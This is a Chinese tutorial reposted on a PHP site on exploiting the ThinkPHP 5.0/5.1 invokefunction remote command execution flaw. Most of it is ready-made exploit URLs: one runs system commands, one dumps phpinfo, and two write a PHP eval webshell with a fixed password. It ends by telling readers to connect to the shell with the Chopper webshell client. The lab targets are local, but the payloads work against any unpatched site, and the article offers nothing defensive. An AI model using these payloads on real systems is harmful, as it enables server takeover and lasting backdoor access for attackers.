• 技术文章 >php框架 >ThinkPHP

    关于ThinkPHP漏洞利用

    藏色散人藏色散人2020-08-31 13:37:53转载932
    下面由thinkphp框架教程栏目给大家介绍ThinkPHP 漏洞利用,希望对需要的朋友有所帮助!

    thinkphp_5x_命令执行漏洞

    受影响版本包括5.0和5.1版本

    docker漏洞环境源码:
    https://github.com/vulnspy/thinkphp-5.1.29
    本地环境搭建:
    thinkphp5.0.15+php5.6n+ apache2.0
    http://www.thinkphp.cn/donate/download/id/1125.html

    利用system函数远程命令执行

    EXP
    http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

    通过phpinfo函数写出phpinfo()信息

    EXP:
    http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

    写入shell

    http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php
    
    或者
    
    http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>

    使用菜刀连接
    `
    http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php 密码为zane

    http://127.0.0.1/middleware/thinkphp_5.0.15_full/test.php 密码为zane
    `

    以上就是关于ThinkPHP漏洞利用的详细内容,更多请关注php中文网其它相关文章!

    声明:本文转载于:cnblogs,如有侵犯,请联系admin@php.cn删除
    专题推荐:ThinkPHP
    上一篇:前方高能,有同学被TP模型的update难住了 下一篇:来聊聊,spl_autoload_register的前世今生
    大前端线上培训班

    相关文章推荐

    • thinkPHP5 ajax提交表单操作实例分析• thinkphp中的find方法有什么作用• 当Redis遇上ThinkPHP5时,该怎么做!• 剖析thinkphp下数据库读写分离代码

    全部评论我要评论

  • 取消发布评论发送
  • 1/1

    PHP中文网